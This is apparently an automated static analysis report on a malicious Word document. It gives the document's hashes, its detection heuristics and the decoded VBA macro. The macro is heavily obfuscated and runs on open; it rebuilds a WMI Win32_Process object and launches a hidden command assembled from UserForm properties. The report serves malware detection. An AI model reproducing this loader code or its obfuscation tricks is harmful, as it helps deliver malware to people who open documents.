Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 e6650aa32b3548c6…

MALICIOUS

Office (OLE)

185.4 KB Created: 2019-12-13 15:20:00 Authoring application: Microsoft Office Word First seen: 2022-06-20
MD5: 92b3ca8ee54f0983747e2906998bb7fb SHA-1: 2499760133f23e1c1b61703442dbbab966980b96 SHA-256: e6650aa32b3548c626f1010e651be2e8fc133cc8d1ba7014bf07b3bfc20314ea
232 Risk Score

Heuristics 8

  • ClamAV: Doc.Downloader.Generic-7452078-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Generic-7452078-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA UserForm hidden-property command stager critical OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER
    VBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
    Matched line in script
    Djcuknykpld = Join(Split("winOMDNmgmOMDNts:WiOMDNn32_OMDN", "OMDN"), "") + Wzlsluxcmitn.Frxrexkafow + "rocess"
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set Mlviehfynbi = CreateObject(Null & Djcuknykpld)
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_open()
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 10991 bytes
SHA-256: 360baa2e8371d149970bac6b48fa0b4ead77c6c70f170b7b260c86e68e558e14
Detection
ClamAV: No threats found
Obfuscation or payload: likely
228 of 353 identifiers look randomly generated (e.g. 'winOMDNmgmOMDNts') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Wzlsluxcmitn"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "Frxrexkafow, 0, 0, MSForms, TextBox"
Private Sub Document_open()
   Zfrwazjrxmqtc = Gghpxzqlx
Sewtqckfpkzw = Qpbbnjuj
Hqiaajuu = Geudvnjwz
Select _
 Case Kcpgjokkt
      Case 172
         Jvlzujffqf _
         = Hex _
         (209)
         Tmuxfzzxjbuxn = CVar(509)
         Qukjaixvzrwt _
         = Hex(981)
      Case 591
         Tdbigvtoqekt = CVar(30)
         Haolbool _
         = 899
         Bnwrufjgzfqys = CDate _
         (364)
      Case 520
         Xbbdfyhgw = _
         CInt(470)
         Dkrmcixghtzcu = Log(Etwjiizeemnh)
         Tgzdvczomdibl = Xzhtkunkmfq
End Select
   Vbeuvvmli = Zmrmmqwzqzv
Iikimmdgaxr = Zhykdcpe
Emrkcmufaeq = Kezvvkyoaul
Select _
 Case Afwtiidufvu
      Case 221
         Tgsroknt _
         = Hex _
         (626)
         Dguugyesf = CVar(883)
         Mojgvhiteje _
         = Hex(906)
      Case 416
         Qswigbdvmasm = CVar(886)
         Xvbcpimhril _
         = 800
         Eajwynzd = CDate _
         (758)
      Case 307
         Wmepsaoq = _
         CInt(82)
         Tlxdgplii = Log(Xnyzvcdtzol)
         Eqlsuhcsqkjs = Pjcrumnzy
End Select
   Lanbfrocgr = Esklhhjdu
Hakywhmrlt = Tbmzweudv
Jaixnbppqqq = Vtsuuzxn
Select _
 Case Rjvimzzrod
      Case 661
         Xnkyqwdl _
         = Hex _
         (89)
         Vlecmajw = CVar(780)
         Hornstcq _
         = Hex(839)
      Case 540
         Bcruwekvibkqx = CVar(915)
         Jdknyhsxhtj _
         = 354
         Gxtmupbsukghp = CDate _
         (909)
      Case 125
         Esqqdyiprds = _
         CInt(433)
         Ejaminolhx = Log(Mwotdfjtf)
         Dtsyyibjbyt = Jtycabwvuh
End Select
Lcjxqrregfpv
End Sub


Attribute VB_Name = "Eailhicuzjotr"
Attribute VB_Base = "0{A0DE5B0E-3A42-4D31-AD8D-9BF7FB3C621F}{C31CCB3A-629D-4A31-8589-006693104201}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Ladkdwna"
Function Tykabrwzuun()
   Qoryrtuxjxfxp = Fptsiuvgnf
Qzpihlmnst = Ezmujhlyiqgl
Hcuheswi = Upylchtlpanji
Select _
 Case Gtwczsdreeksl
      Case 219
         Vwvoatizv _
         = Hex _
         (262)
         Vvppxuukyzzfd = CVar(464)
         Xuhsoiwjfqo _
         = Hex(240)
      Case 9
         Dxtbacxicogpy = CVar(398)
         Gvrrjkwoscn _
         = 990
         Lkyjauhbfyeah = CDate _
         (622)
      Case 312
         Fadphgdjzwjp = _
         CInt(289)
         Bznozwrqxp = Log(Paxmqccajrzx)
         Iaznrfarezrm = Dpdnlorcmn
End Select
Bahavnjxvpr = Wzlsluxcmitn.Frxrexkafow
   Klwlwotnisrch = Cqzaqyykcsf
Ifmwogot = Wmbidccsrar
Sfhbmausqu = Cgunahuwc
Select _
 Case Ppvhzzosjkw
      Case 936
         Gfbtmvfrjda _
         = Hex _
         (487)
         Fqswbgpqs = CVar(298)
         Suscbjugmdgv _
         = Hex(820)
      Case 817
         Khxwfmul = CVar(217)
         Xamjpdaoujar _
         = 600
         Pajtjeyv = CDate _
         (58)
      Case 109
         Rystnywhcxeb = _
         CInt(523)
         Qidsawaset = Log(Dbbmwbnrr)
         Gavmtpeyod = Bbfupuzu
End Select
Zfiwvmskvqzu = Bahavnjxvpr + Eailhicuzjotr.Zrlpryhuqkt + Eailhicuzjotr.Leduriedcjuge + Eailhicuzjotr.Yzvfmnkir
   Jvivsalsfz = Pkossydc
Zjxidxwcbzcl = Lhdzgktxbenhd
Dhxjsvyyj = Wcxvzdpshku
Select _
 Case Tycitvvueyxse
      Case 1
         Amjucsoq _
         = Hex _
         (977)
         Ejslktjcb = CVar(788)
         Tqeobtreadua _
         = Hex(752)
      Case 520
         Vaabcfhccold = CVar(315)
         Enpcnigwefbz _
         = 983
         Yckiftpsjb = CDate _
         (532)
      Case 378
         Mqnqcxjxzm = _
         CInt(276)
         Ndkyvuacjvez = Log(Ypeleodd)
         Iocdpymmosv = Qwoawarmnm
End Select
Ygwxzqui = Zfiwvmskvqzu + Eailhicuzjotr.Hoosyqxdiqzve + Eailhicuzjotr.Wizlkhvyxuqv.ControlTipText
   Kbhzaldy = Ydkhlriaghtw
Rzzcisfgederk = Csiqitkol
Fwckhnzlh = Apnnryhcth
Select _
 Case Eplftcgknecm
      Case 462
         Uvrszzgp _
         = Hex _
         (433)
         Dublhieyddyv = CVar(110)
         Fibqzwnae _
         = Hex(702)
      Case 989
         Llbicmoxs = CVar(363)
         Budezdjffzyjm _
         = 291
         Pquedqohvxdqa = CDate _
         (497)
      Case 810
         Xdghggnuxk = _
         CInt(103)
         Hencorewycnyi = Log(Hhvninwcucf)
         Bvxumrgciuoy = Luphzusgnbwi
End Select
Tykabrwzuun = Fjdzsojwt + Ygwxzqui + Fjdzsojwt
   Qczvaofa = Duxjskucxcegf
Knhgbaohgbzy = Omilbyxrxie
Xbyjwjaqax = Vpnqitmnlj
Select _
 Case Vdrysqzcprrgi
      Case 962
         Oganpozf _
         = Hex _
         (450)
         Boprzxolco = CVar(136)
         Cxkyrwdxgirq _
         = Hex(316)
      Case 123
         Kvahwxinr = CVar(171)
         Kqudugckwe _
         = 621
         Qwccldsw = CDate _
         (338)
      Case 125
         Snskusujogio = _
         CInt(383)
         Jumcpfcbh = Log(Ltvxkyfkrx)
         Jljpmqwubp = Qrqhtqqgzaiz
End Select
End Function
Function Lcjxqrregfpv()
   Cnmjjlmhwnhem = Tgqthcftiaqay
Wmeswivb = Btiuoimvfqkzo
Wudjslnuuquz = Qyedwgjxzu
Select _
 Case Eswqxyry
      Case 996
         Rsulnzndujs _
         = Hex _
         (4)
         Sgwsgkzvjro = CVar(143)
         Xetwiwkcglik _
         = Hex(216)
      Case 688
         Kvzilsdeka = CVar(971)
         Nzsibgfscj _
         = 839
         Bwbmlunhnapaj = CDate _
         (5)
      Case 706
         Nrstsqwi = _
         CInt(928)
         Xkcfahakch = Log(Rsqmyxmkrzsd)
         Jpsheoqc = Lcntoqgbow
End Select
Djcuknykpld = Join(Split("winOMDNmgmOMDNts:WiOMDNn32_OMDN", "OMDN"), "") + Wzlsluxcmitn.Frxrexkafow + "rocess"
   Kqcwqfeugzfk = Ipotdlnyi
Hakwlisymfym = Toiatwplj
Fwmafmiseiet = Rmmszkdcnjxf
Select _
 Case Ncvredglfxh
      Case 838
         Thwoukecjdt _
         = Hex _
         (555)
         Ocicczotfbnmo = CVar(666)
         Fgokgtjvqvc _
         = Hex(322)
      Case 884
         Mdyciiodddvh = CVar(18)
         Nfjcgqpwcpjcb _
         = 679
         Shzfugcdl = CDate _
         (303)
      Case 395
         Flcdscbxv = _
         CInt(517)
         Swddpajsg = Log(Wkvvckplcy)
         Leuzwgae = Kodbrrbtsxy
End Select
Set Mlviehfynbi = CreateObject(Null & Djcuknykpld)
   Knyyyzpgi = Tyvqufsotjx
Ccmmicfwsam = Dznvksyv
Mpzbtabw = Iwwmcxgys
Select _
 Case Jysctbyyfjutb
      Case 918
         Jamvrezmthdbt _
         = Hex _
         (97)
         Zcidcrhzzz = CVar(127)
         Hxocvleofmwjt _
         = Hex(703)
      Case 482
         Yuqzfmsjsl = CVar(816)
         Fcbmwogspffip _
         = 385
         Gmfyjtfiejzxl = CDate _
         (987)
      Case 869
         Wqxnyleazun = _
         CInt(269)
         Tohjqolxmmofa = Log(Cxrvebjplcpmc)
         Evciopcpg = Qjdiiyrh
End Select
Zkmbajjkvng = Djcuknykpld + Eailhicuzjotr.Bnornhmwuft.ControlTipText + Eailhicuzjotr.Btkxiqjnk.ControlTipText
   Qiijeduclwtn = Bnasblkcwm
Dowgxays = Zfibgojcmqbw
Mwjxkomv = Zffeyton
Select _
 Case Nukzfwtua
      Case 358
         Husubqbi _
         = Hex _
         (945)
         Dlgcaieds = CVar(533)
         Snqrljsourv _
         = Hex(233)
      Case 89
         Rlnkwcnenykid = CVar(676)
         Npqhxopg _
         = 461
         Phiuwqhr = CDate _
         (933)
      Case 959
         Puthpojfof = _
         CInt(266)
         Lnafbnwlc = Log(Igvekridrw)
         Tvjsjekrwth = Tqouvwhkjkau
End Select
Ccupqwhpsoob = Zkmbajjkvng + Wzlsluxcmitn.Frxrexkafow
   Gmcwqswagyq = Rnjidanh
Slbmbsit = Nolhqsyloi
Ourmrygeojw = Lpfuiyesaq
Select _
 Case Crkbcsbr
      Case 203
         Gvobjntxesaxe _
         = Hex _
         (800)
         Qgjeuodokpgw = CVar(993)
         Qvtfpikfgo _
         = Hex(724)
      Case 282
         Cmkaemgillrmj = CVar(253)
         Heldrrln _
         = 289
         Spvjkzunv = CDate _
         (531)
      Case 740
         Dkkupuaedgvi = _
         CInt(956)
         Bulairyn = Log(Xkzblwzoul)
         Ajbxkjtbwgrg = Jmnutpryw
End Select
Set Lcjxqrregfpv = CreateObject(Ccupqwhpsoob)
   Sdsfkacerbi = Wwsqktqeodjiq
Povjbmsbzkt = Upussyoudpod
Ezjxtjmodf = Keusgrlw
Select _
 Case Jrprcvlyhffco
      Case 935
         Nzzifmotpnk _
         = Hex _
         (612)
         Jwszafqrhc = CVar(24)
         Deysxipscts _
         = Hex(72)
      Case 503
         Emuxadsvapk = CVar(115)
         Bimyfwsrc _
         = 114
         Arfuiiqehlw = CDate _
         (300)
      Case 4
         Uhyovcpogrghf = _
         CInt(410)
         Wtwbeexiyxn = Log(Gfufoqexxdwzr)
         Ayncfcinoupr = Arilqiaxaspyp
End Select
Lcjxqrregfpv.XSize = False * False
   Eknxqyskvna = Fcldxvxeaxtv
Qofapmhf = Zpsxxoxkkfqm
Wgimentcb = Vpnlknzz
Select _
 Case Hczglzik
      Case 328
         Efadjevbpz _
         = Hex _
         (727)
         Xvcykzzrqnr = CVar(475)
         Difsokrsixp _
         = Hex(361)
      Case 119
         Cfsyjsgsee = CVar(592)
         Ojlrwrozof _
         = 667
         Ibofwoymkax = CDate _
         (504)
      Case 476
         Rdzuwyeafzbgb = _
         CInt(177)
         Bovwjcphd = Log(Qfrcomrrenpfs)
         Pdcnzvbrlvfa = Cwvsziyjdkooj
End Select
Lcjxqrregfpv.YSize = False * False
   Mxgpruvddfqzi = Vatbrducfapm
Ivsnshrb = Gthiuxwlfoi
Vmtrvapbihzvj = Prdtvevyvm
Select _
 Case Ddhyufywa
      Case 508
         Waqnylimkzk _
         = Hex _
         (776)
         Lohsaoxfnsl = CVar(450)
         Ifqlalqb _
         = Hex(175)
      Case 522
         Eqwmnzxishtn = CVar(539)
         Fvmckjhepxddw _
         = 48
         Zflfvdcebjfqk = CDate _
         (341)
      Case 40
         Gvytffynqxl = _
         CInt(249)
         Zikdxjsc = Log(Kudrktfsx)
         Qhedutbsvhkdb = Ybtaaozmnycn
End Select
Do While Mlviehfynbi.Create(Null & Tykabrwzuun, Qxlgpmsayi, Lcjxqrregfpv)
Loop
   Dwrgtyayfm = Lbfebgrj
Fzjvwguez = Xmztdjnczy
Mobwfkwpvtv = Wxcudbmcropg
Select _
 Case Xegpjqjwhukpt
      Case 496
         Qdricglkivwc _
         = Hex _
         (437)
         Zlpunylpelah = CVar(685)
         Hjnijjalyxi _
         = Hex(483)
      Case 531
         Tytmovbhju = CVar(570)
         Ehbygiugu _
         = 913
         Hoteunnsmvnsq = CDate _
         (381)
      Case 688
         Lmziyptceczmr = _
         CInt(181)
         Kqqzmyvrgtv = Log(Krokoiwih)
         Jomobubvd = Wbqyzquspc
End Select
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.